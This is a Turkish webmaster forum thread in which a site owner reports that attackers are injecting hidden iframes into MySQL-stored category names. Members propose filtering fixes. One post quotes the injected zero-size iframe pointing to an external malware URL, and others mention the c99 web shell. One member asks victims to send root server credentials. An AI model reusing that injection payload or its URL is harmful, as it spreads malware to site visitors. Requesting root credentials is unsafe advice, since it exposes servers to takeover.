İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

mysql'e sızma hakkında yardım edebilecek birileri var mı?

KATILSANA

0
İyinet Üyesi
Reaction score
34
Merhaba arkadaşlar.
Bir sitemin mysql'ine sızarak virüs yaymaya çalışıyorlar. Muhtemelen bir yerde açık var ama henüz bunu bulabilmiş/anlayabilmiş değilim. Ve bu şekilde devam ederse zararlı site uyarısı kaçınılmaz görünüyor. Bir an önce bu problemi çözmem lazım.
Bunun önüne nasıl geçebilirim? Açık nerede olabilir? Veya yardımcı olabilecek birileri var mı?

Şimdiden teşekkürler.

yagmayok

1
İyinet Üyesi
Reaction score
89
Eklenen kod bir html, script kodumudur ?

birde bu eklenen virüs kodunun sitenize kullanıcıların ekleme yaptığı ( yorum ) gibi bir alandan gelme ihtimali var. Bu bölümde gelen bilgileri veya herhangi bir yerdeki değişkenleri ( GET,POST .. ) bir filtreden geçirmiyorsanız kodlar eklenebilir.

KATILSANA

0
İyinet Üyesi
Reaction score
34
Hayır o şekilde gelmiyor.
iframe ile bir siteye yönlendiriliyor.
Kod :

<iframe src="http://bomberoslb.com.ar/logs/index.html" width="0" height="0" frameborder="0"> </iframe>

Z.YÜKSEL

0
İyinet Üyesi
Reaction score
18
hehe.js adında da ekleniyor mu ?

Şuan aynı şekilde benim sitelerden birisinede ekleniyor, npu.ac tarzında js. virüsü, fakat bir türlü çözüm yok.

Invictus

0
İyinet Üyesi
Reaction score
8
mysql a mı ekleniyor yoksa dosyalara mı? biliyorum mysql demişsiniz ama yine de sorayım dedim, çünkü iframe virüsü genelde dosyalara eklenir.

KATILSANA

0
İyinet Üyesi
Reaction score
34
Zeki hayır canım. Sadece iframe var. js dosyası yok. Yine de bir bakayım. :rolleyes:

KATILSANA

0
İyinet Üyesi
Reaction score
34
mysql a mı ekleniyor yoksa dosyalara mı? biliyorum mysql demişsiniz ama yine de sorayım dedim, çünkü iframe virüsü genelde dosyalara eklenir.

mysql'e ekleniyor.

Sql'de kayıtlı olan bir konu değiştirilip iframe basılıyor onun yerine. Mesela bir kategori adı var ABC olarak.
O ABC kategorisi direk iframe kodu oluyor. :(

Invictus

0
İyinet Üyesi
Reaction score
8
PHP:
function noiframe($data) {
    $data = preg_replace('#<iframe.*?</iframe>#si', '', $data);
    return $data;
}

bunu fonksiyon dosyana ekleyip, mysqla eklenen değerleri noiframe($deger); olarak kullanıp iframe kodlarını süzebilirsin

Z.YÜKSEL

0
İyinet Üyesi
Reaction score
18
Bunu yapan pezevengi sende biliyorsun , şerefsiz bizlerin üzerinden adsense kasıyor, benim ie yide kitledi.

MSN geldiğinde görüşelim fakat bu olay scriptle alakası yok bu olayın alakası ortak bizim, geldiğinde görüşelim.

E

Erturk

Misafir
PHP:
function noiframe($data) {
    $data = preg_replace('#<iframe.*?</iframe>#si', '', $data);
    return $data;
}

bunu fonksiyon dosyana ekleyip, mysqla eklenen değerleri noiframe($deger); olarak kullanıp iframe kodlarını süzebilirsin

Invictus arkadasımız guzel bir fonksiyon vermiş. Gayet mantıklı. Fakat bunun yerine form uygulamalarından gelen verileri htmlspecialchars(strip_tags($_POST['postadi'])); seklinde süzsenizde kafi olacaktır. Her iki türlüde sıkıntı yasamazsınız.

Z.YÜKSEL

0
İyinet Üyesi
Reaction score
18
Invictus verdiğin kodu deniyelim bakalım.
Fakat sql sorgusu ile halledemezmiyiz bunu ? Yoksa tüm input kullanılan yerlere eklemeye kalkarsak script baya karışık baya güç olucak.

KATILSANA

0
İyinet Üyesi
Reaction score
34
Hemen deneyeceğim.

exe'sini versem, açabilecek bir babayiğit bulunur mu acep? :)

kuaza

0
İyinet Üyesi
Reaction score
7
ilk basta shell dusundum ama bunun script acigiyla olusuguna emin oldum simdi :) erturk un dedigi gibi gelen verileri suzmenizde fayda var..

Z.YÜKSEL

0
İyinet Üyesi
Reaction score
18
ilk basta shell dusundum ama bunun script acigiyla olusuguna emin oldum simdi :) erturk un dedigi gibi gelen verileri suzmenizde fayda var..

Açıkcası yazdığınla alakası yok, çünki ben c99 denedim kendi hostumda evet attığımız shell ile config dosyasını okuyabiliyorduk daha sonra o açığı kapattırdık fakat şuan videolarn açıklama kısmına ekliyorlar, bir şekilde giriyorlar fakat nasıl çözebilmiş değiliz, Softlayer sistem mühendisleri tarıyor fakat bir sonuç yok.

kuaza

0
İyinet Üyesi
Reaction score
7
Açıkcası yazdığınla alakası yok, çünki ben c99 denedim kendi hostumda evet attığımız shell ile config dosyasını okuyabiliyorduk daha sonra o açığı kapattırdık fakat şuan videolarn açıklama kısmına ekliyorlar, bir şekilde giriyorlar fakat nasıl çözebilmiş değiliz, Softlayer sistem mühendisleri tarıyor fakat bir sonuç yok.
hocam bir suru shell var, hepsininde farkli gorevleri ve ozellikleri var. cogu shell ile dosyalar uzerinde de oynama yapilabilir. kendiniz soylediniz aradik ama bulamadik diye.. Sonucda geriye tek bir aciklama kaliyor oda adres satirini kullanip get post ile gonderilen verileri kotu amaclar icin kullanilmasi. varsa farkli bir yol daha onuda ben bilmiyorum :D

Z.YÜKSEL

0
İyinet Üyesi
Reaction score
18
hocam bir suru shell var, hepsininde farkli gorevleri ve ozellikleri var. cogu shell ile dosyalar uzerinde de oynama yapilabilir. kendiniz soylediniz aradik ama bulamadik diye.. Sonucda geriye tek bir aciklama kaliyor oda adres satirini kullanip get post ile gonderilen verileri kotu amaclar icin kullanilmasi. varsa farkli bir yol daha onuda ben bilmiyorum :D

Aynı şeyi düşünüyoruz aslında, neyse arkadaş bakıyor bakalım, iframe değişkenini engelliyecek komple umarım başarılı olur.

Loi

0
İyinet Üyesi
Reaction score
44
hehe.js adında da ekleniyor mu ?

Şuan aynı şekilde benim sitelerden birisinede ekleniyor, npu.ac tarzında js. virüsü, fakat bir türlü çözüm yok.

Ben bunun için geçiçi çözüm ürettim.
Dedicated sunucusu üzerinde sitelerine bu virus bulaşan varsa daha detaylı inceleyebilirim.

Varsa Dedicated sunucunuz ücretsiz inceleyebilirim.
Root bilgilerinizi, virusun bulaştığı siteyi, ornek konu linklerini gönderin bu aksam inceleyeyim.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5